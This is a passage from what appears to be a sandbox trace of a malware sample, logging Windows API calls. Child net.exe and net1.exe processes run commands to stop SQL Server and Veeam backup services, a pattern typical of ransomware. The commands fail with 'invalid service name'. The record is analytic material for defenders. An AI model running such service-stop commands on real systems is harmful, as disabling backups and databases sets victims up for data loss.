_String2="SQLBROWSER") returned 1 [0207.638] _wcsicmp (_String1="lanmanserver", _String2="SQLBROWSER") returned -7 [0207.638] _wcsicmp (_String1="alerter", _String2="SQLBROWSER") returned -18 [0207.638] _wcsicmp (_String1="netlogon", _String2="SQLBROWSER") returned -5 [0207.638] NetServiceControl (in: servername=0x0, service="SQLBROWSER", opcode=0x0, arg=0x0, bufptr=0x2af880 | out: bufptr=0x2af880) returned 0x889 [0207.639] wcscpy_s (in: _Destination=0x73a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0207.639] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0207.640] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x73b338, nSize=0x800, Arguments=0x739dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0207.641] GetFileType (hFile=0x26c) returned 0x3 [0207.641] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x2c3ff8 [0207.641] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x2c3ff8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0207.641] WriteFile (in: hFile=0x26c, lpBuffer=0x2c3ff8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2af7c0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2af7c0, lpOverlapped=0x0) returned 0 [0207.641] LocalFree (hMem=0x2c3ff8) returned 0x0 [0207.641] GetFileType (hFile=0x26c) returned 0x3 [0207.641] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2c62a0 [0207.641] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2c62a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n,", lpUsedDefaultChar=0x0) returned 2 [0207.641] WriteFile (in: hFile=0x26c, lpBuffer=0x2c62a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2af7c0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2af7c0, lpOverlapped=0x0) returned 0 [0207.641] LocalFree (hMem=0x2c62a0) returned 0x0 [0207.641] _ultow (in: _Dest=0x889, _Radix=2815984 | out: _Dest=0x889) returned="2185" [0207.641] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x73b338, nSize=0x800, Arguments=0x739dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0207.641] GetFileType (hFile=0x26c) returned 0x3 [0207.641] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2c62a0 [0207.641] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2c62a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0207.642] WriteFile (in: hFile=0x26c, lpBuffer=0x2c62a0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2af7cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2af7cc, lpOverlapped=0x0) returned 0 [0207.642] LocalFree (hMem=0x2c62a0) returned 0x0 [0207.642] GetFileType (hFile=0x26c) returned 0x3 [0207.642] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2c62a0 [0207.642] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2c62a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n,", lpUsedDefaultChar=0x0) returned 2 [0207.642] WriteFile (in: hFile=0x26c, lpBuffer=0x2c62a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2af7cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2af7cc, lpOverlapped=0x0) returned 0 [0207.642] LocalFree (hMem=0x2c62a0) returned 0x0 [0207.642] NetApiBufferFree (Buffer=0x2c1c70) returned 0x0 [0207.643] NetApiBufferFree (Buffer=0x2c1c88) returned 0x0 [0207.643] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLBrowser /y" [0207.643] exit (_Code=2) Process: id = "252" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x20c3a000" os_pid = "0x8e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQLFDLauncher$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 425 os_tid = 0x8e8 Process: id = "253" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x1ca06000" os_pid = "0x8ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "252" os_parent_pid = "0x8e4" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 426 os_tid = 0x8fc [0207.787] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x13fbfc | out: lpSystemTimeAsFileTime=0x13fbfc*(dwLowDateTime=0x450a53c0, dwHighDateTime=0x1d57a87)) [0207.787] GetCurrentProcessId () returned 0x8ec [0207.787] GetCurrentThreadId () returned 0x8fc [0207.787] GetTickCount () returned 0x116d8c3 [0207.787] QueryPerformanceCounter (in: lpPerformanceCount=0x13fbf4 | out: lpPerformanceCount=0x13fbf4*=32807168552) returned 1 [0207.787] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0207.787] __set_app_type (_Type=0x1) [0207.787] __p__fmode () returned 0x74eb31f4 [0207.787] __p__commode () returned 0x74eb31fc [0207.788] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf1ffe6) returned 0x0 [0207.788] __getmainargs (in: _Argc=0xf29064, _Argv=0xf2906c, _Env=0xf29068, _DoWildCard=0, _StartInfo=0xf29024 | out: _Argc=0xf29064, _Argv=0xf2906c, _Env=0xf29068) returned 0 [0207.788] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0207.788] GetConsoleOutputCP () returned 0x1b5 [0207.788] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf29080 | out: lpCPInfo=0xf29080) returned 1 [0207.788] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.791] sprintf_s (in: _DstBuf=0x13fbb4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0207.791] setlocale (category=0, locale=".437") returned="English_United States.437" [0207.793] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0207.793] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0207.793] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SQL_2008 /y" [0207.793] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x13f980, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0207.793] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x84) returned 0x6c4bf8 [0207.793] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0207.794] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x13fb84 | out: Buffer=0x13fb84*=0x6c1c90) returned 0x0 [0207.794] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x13fb84 | out: Buffer=0x13fb84*=0x6c1ca8) returned 0x0 [0207.794] _fileno (_File=0x74eb2900) returned -2 [0207.794] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0207.794] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0207.794] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0207.794] _wcsicmp (_String1="config", _String2="stop") returned -16 [0207.794] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0207.794] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0207.794] _wcsicmp (_String1="file", _String2="stop") returned -13 [0207.794] _wcsicmp (_String1="files", _String2="stop") returned -13 [0207.794] _wcsicmp (_String1="group", _String2="stop") returned -12 [0207.794] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0207.794] _wcsicmp (_String1="help", _String2="stop") returned -11 [0207.794] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0207.794] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0207.794] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0207.794] _wcsicmp (_String1="session", _String2="stop") returned -15 [0207.794] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0207.794] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0207.794] _wcsicmp (_String1="share", _String2="stop") returned -12 [0207.794] _wcsicmp (_String1="start", _String2="stop") returned -14 [0207.794] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0207.794] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0207.794] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0207.794] _wcsicmp (_String1="accounts", _String2="MSSQLFDLauncher$SQL_2008") returned -12 [0207.794] _wcsicmp (_String1="computer", _String2="MSSQLFDLauncher$SQL_2008") returned -10 [0207.794] _wcsicmp (_String1="config", _String2="MSSQLFDLauncher$SQL_2008") returned -10 [0207.794] _wcsicmp (_String1="continue", _String2="MSSQLFDLauncher$SQL_2008") returned -10 [0207.795] _wcsicmp (_String1="cont", _String2="MSSQLFDLauncher$SQL_2008") returned -10 [0207.795] _wcsicmp (_String1="file", _String2="MSSQLFDLauncher$SQL_2008") returned -7 [0207.795] _wcsicmp (_String1="files", _String2="MSSQLFDLauncher$SQL_2008") returned -7 [0207.795] _wcsicmp (_String1="group", _String2="MSSQLFDLauncher$SQL_2008") returned -6 [0207.795] _wcsicmp (_String1="groups", _String2="MSSQLFDLauncher$SQL_2008") returned -6 [0207.795] _wcsicmp (_String1="help", _String2="MSSQLFDLauncher$SQL_2008") returned -5 [0207.795] _wcsicmp (_String1="helpmsg", _String2="MSSQLFDLauncher$SQL_2008") returned -5 [0207.795] _wcsicmp (_String1="localgroup", _String2="MSSQLFDLauncher$SQL_2008") returned -1 [0207.795] _wcsicmp (_String1="pause", _String2="MSSQLFDLauncher$SQL_2008") returned 3 [0207.795] _wcsicmp (_String1="session", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0207.795] _wcsicmp (_String1="sessions", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0207.795] _wcsicmp (_String1="sess", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0207.795] _wcsicmp (_String1="share", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0207.795] _wcsicmp (_String1="start", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0207.795] _wcsicmp (_String1="stats", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0207.795] _wcsicmp (_String1="statistics", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0207.795] _wcsicmp (_String1="stop", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0207.795] _wcsicmp (_String1="time", _String2="MSSQLFDLauncher$SQL_2008") returned 7 [0207.795] _wcsicmp (_String1="user", _String2="MSSQLFDLauncher$SQL_2008") returned 8 [0207.795] _wcsicmp (_String1="users", _String2="MSSQLFDLauncher$SQL_2008") returned 8 [0207.795] _wcsicmp (_String1="msg", _String2="MSSQLFDLauncher$SQL_2008") returned -12 [0207.795] _wcsicmp (_String1="messenger", _String2="MSSQLFDLauncher$SQL_2008") returned -14 [0207.795] _wcsicmp (_String1="receiver", _String2="MSSQLFDLauncher$SQL_2008") returned 5 [0207.795] _wcsicmp (_String1="rcv", _String2="MSSQLFDLauncher$SQL_2008") returned 5 [0207.795] _wcsicmp (_String1="netpopup", _String2="MSSQLFDLauncher$SQL_2008") returned 1 [0207.795] _wcsicmp (_String1="redirector", _String2="MSSQLFDLauncher$SQL_2008") returned 5 [0207.795] _wcsicmp (_String1="redir", _String2="MSSQLFDLauncher$SQL_2008") returned 5 [0207.795] _wcsicmp (_String1="rdr", _String2="MSSQLFDLauncher$SQL_2008") returned 5 [0207.795] _wcsicmp (_String1="workstation", _String2="MSSQLFDLauncher$SQL_2008") returned 10 [0207.795] _wcsicmp (_String1="work", _String2="MSSQLFDLauncher$SQL_2008") returned 10 [0207.795] _wcsicmp (_String1="wksta", _String2="MSSQLFDLauncher$SQL_2008") returned 10 [0207.795] _wcsicmp (_String1="prdr", _String2="MSSQLFDLauncher$SQL_2008") returned 3 [0207.795] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLauncher$SQL_2008") returned -9 [0207.795] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLauncher$SQL_2008") returned -1 [0207.795] _wcsicmp (_String1="server", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0207.795] _wcsicmp (_String1="svr", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0207.795] _wcsicmp (_String1="srv", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0207.795] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLauncher$SQL_2008") returned -1 [0207.796] _wcsicmp (_String1="alerter", _String2="MSSQLFDLauncher$SQL_2008") returned -12 [0207.796] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLauncher$SQL_2008") returned 1 [0207.796] _wcsupr (in: _String="MSSQLFDLauncher$SQL_2008" | out: _String="MSSQLFDLAUNCHER$SQL_2008") returned="MSSQLFDLAUNCHER$SQL_2008" [0207.796] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6c54d0 [0207.798] GetServiceKeyNameW (in: hSCManager=0x6c54d0, lpDisplayName="MSSQLFDLAUNCHER$SQL_2008", lpServiceName=0xf2aaf0, lpcchBuffer=0x13fb20 | out: lpServiceName="", lpcchBuffer=0x13fb20) returned 0 [0207.799] _wcsicmp (_String1="msg", _String2="MSSQLFDLAUNCHER$SQL_2008") returned -12 [0207.799] _wcsicmp (_String1="messenger", _String2="MSSQLFDLAUNCHER$SQL_2008") returned -14 [0207.799] _wcsicmp (_String1="receiver", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 5 [0207.799] _wcsicmp (_String1="rcv", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 5 [0207.799] _wcsicmp (_String1="redirector", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 5 [0207.799] _wcsicmp (_String1="redir", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 5 [0207.799] _wcsicmp (_String1="rdr", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 5 [0207.799] _wcsicmp (_String1="workstation", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 10 [0207.799] _wcsicmp (_String1="work", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 10 [0207.799] _wcsicmp (_String1="wksta", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 10 [0207.799] _wcsicmp (_String1="prdr", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 3 [0207.799] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLAUNCHER$SQL_2008") returned -9 [0207.799] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLAUNCHER$SQL_2008") returned -1 [0207.799] _wcsicmp (_String1="server", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 6 [0207.799] _wcsicmp (_String1="svr", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 6 [0207.799] _wcsicmp (_String1="srv", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 6 [0207.799] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLAUNCHER$SQL_2008") returned -1 [0207.799] _wcsicmp (_String1="alerter", _String2="MSSQLFDLAUNCHER$SQL_2008") returned -12 [0207.799] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 1 [0207.799] NetServiceControl (in: servername=0x0, service="MSSQLFDLAUNCHER$SQL_2008", opcode=0x0, arg=0x0, bufptr=0x13fb1c | out: bufptr=0x13fb1c) returned 0x889 [0207.800] wcscpy_s (in: _Destination=0xf2a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0207.800] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0207.801] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xf2b338, nSize=0x800, Arguments=0xf29dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0207.802] GetFileType (hFile=0x26c) returned 0x3 [0207.802] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x6c3ca0 [0207.802] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x6c3ca0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0207.802] WriteFile (in: hFile=0x26c, lpBuffer=0x6c3ca0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x13fa5c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x13fa5c, lpOverlapped=0x0) returned 0 [0207.802] LocalFree (hMem=0x6c3ca0) returned 0x0 [0207.802] GetFileType (hFile=0x26c) returned 0x3 [0207.802] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6c6298 [0207.802] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6c6298, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nl", lpUsedDefaultChar=0x0) returned 2 [0207.802] WriteFile (in: hFile=0x26c, lpBuffer=0x6c6298, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x13fa5c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x13fa5c, lpOverlapped=0x0) returned 0 [0207.802] LocalFree (hMem=0x6c6298) returned 0x0 [0207.802] _ultow (in: _Dest=0x889, _Radix=1309324 | out: _Dest=0x889) returned="2185" [0207.802] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xf2b338, nSize=0x800, Arguments=0xf29dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0207.802] GetFileType (hFile=0x26c) returned 0x3 [0207.802] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x6c6298 [0207.802] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x6c6298, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0207.803] WriteFile (in: hFile=0x26c, lpBuffer=0x6c6298, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x13fa68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x13fa68, lpOverlapped=0x0) returned 0 [0207.803] LocalFree (hMem=0x6c6298) returned 0x0 [0207.803] GetFileType (hFile=0x26c) returned 0x3 [0207.803] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6c6298 [0207.803] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6c6298, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nl", lpUsedDefaultChar=0x0) returned 2 [0207.803] WriteFile (in: hFile=0x26c, lpBuffer=0x6c6298, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x13fa68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x13fa68, lpOverlapped=0x0) returned 0 [0207.803] LocalFree (hMem=0x6c6298) returned 0x0 [0207.803] NetApiBufferFree (Buffer=0x6c1c90) returned 0x0 [0207.803] NetApiBufferFree (Buffer=0x6c1ca8) returned 0x0 [0207.803] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SQL_2008 /y" [0207.803] exit (_Code=2) Process: id = "254" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x67f3f000" os_pid = "0x900" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop VeeamBackupSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 427 os_tid = 0x904 Process: id = "255" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4cd6d000" os_pid = "0xb18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "254" os_parent_pid = "0x900" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamBackupSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 428 os_tid = 0x880 [0207.968] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31fb1c | out: lpSystemTimeAsFileTime=0x31fb1c*(dwLowDateTime=0x4526e440, dwHighDateTime=0x1d57a87)) [0207.968] GetCurrentProcessId () returned 0xb18 [0207.968] GetCurrentThreadId () returned 0x880 [0207.968] GetTickCount () returned 0x116d97e [0207.968] QueryPerformanceCounter (in: lpPerformanceCount=0x31fb14 | out: lpPerformanceCount=0x31fb14*=32825306439) returned 1 [0207.969] GetModuleHandleA (lpModuleName=0x0) returned 0xdc0000 [0207.969] __set_app_type (_Type=0x1) [0207.969] __p__fmode () returned 0x74eb31f4 [0207.969] __p__commode () returned 0x74eb31fc [0207.969] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xdcffe6) returned 0x0 [0207.969] __getmainargs (in: _Argc=0xdd9064, _Argv=0xdd906c, _Env=0xdd9068, _DoWildCard=0, _StartInfo=0xdd9024 | out: _Argc=0xdd9064, _Argv=0xdd906c, _Env=0xdd9068) returned 0 [0207.969] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0207.969] GetConsoleOutputCP () returned 0x1b5 [0207.969] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xdd9080 | out: lpCPInfo=0xdd9080) returned 1 [0207.969] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.972] sprintf_s (in: _DstBuf=0x31fad4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0207.972] setlocale (category=0, locale=".437") returned="English_United States.437" [0207.974] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0207.974] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0207.974] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamBackupSvc /y" [0207.974] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x31f8a0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0207.974] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x70) returned 0x793c18 [0207.975] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0207.975] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x31faa4 | out: Buffer=0x31faa4*=0x791c78) returned 0x0 [0207.975] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x31faa4 | out: Buffer=0x31faa4*=0x791c90) returned 0x0 [0207.975] _fileno (_File=0x74eb2900) returned -2 [0207.975] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0207.975] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0207.975] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0207.975] _wcsicmp (_String1="config", _String2="stop") returned -16 [0207.975] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0207.975] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0207.975] _wcsicmp (_String1="file", _String2="stop") returned -13 [0207.975] _wcsicmp (_String1="files", _String2="stop") returned -13 [0207.975] _wcsicmp (_String1="group", _String2="stop") returned -12 [0207.975] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0207.975] _wcsicmp (_String1="help", _String2="stop") returned -11 [0207.975] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0207.975] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0207.975] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0207.975] _wcsicmp (_String1="session", _String2="stop") returned -15 [0207.975] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0207.975] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0207.975] _wcsicmp (_String1="share", _String2="stop") returned -12 [0207.975] _wcsicmp (_String1="start", _String2="stop") returned -14 [0207.976] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0207.976] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0207.976] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0207.976] _wcsicmp (_String1="accounts", _String2="VeeamBackupSvc") returned -21 [0207.976] _wcsicmp (_String1="computer", _String2="VeeamBackupSvc") returned -19 [0207.976] _wcsicmp (_String1="config", _String2="VeeamBackupSvc") returned -19 [0207.976] _wcsicmp (_String1="continue", _String2="VeeamBackupSvc") returned -19 [0207.976] _wcsicmp (_String1="cont", _String2="VeeamBackupSvc") returned -19 [0207.976] _wcsicmp (_String1="file", _String2="VeeamBackupSvc") returned -16 [0207.976] _wcsicmp (_String1="files", _String2="VeeamBackupSvc") returned -16 [0207.976] _wcsicmp (_String1="group", _String2="VeeamBackupSvc") returned -15 [0207.976] _wcsicmp (_String1="groups", _String2="VeeamBackupSvc") returned -15 [0207.976] _wcsicmp (_String1="help", _String2="VeeamBackupSvc") returned -14 [0207.976] _wcsicmp (_String1="helpmsg", _String2="VeeamBackupSvc") returned -14 [0207.976] _wcsicmp (_String1="localgroup", _String2="VeeamBackupSvc") returned -10 [0207.976] _wcsicmp (_String1="pause", _String2="VeeamBackupSvc") returned -6 [0207.976] _wcsicmp (_String1="session", _String2="VeeamBackupSvc") returned -3 [0207.976] _wcsicmp (_String1="sessions", _String2="VeeamBackupSvc") returned -3 [0207.976] _wcsicmp (_String1="sess", _String2="VeeamBackupSvc") returned -3 [0207.976] _wcsicmp (_String1="share", _String2="VeeamBackupSvc") returned -3 [0207.976] _wcsicmp (_String1="start", 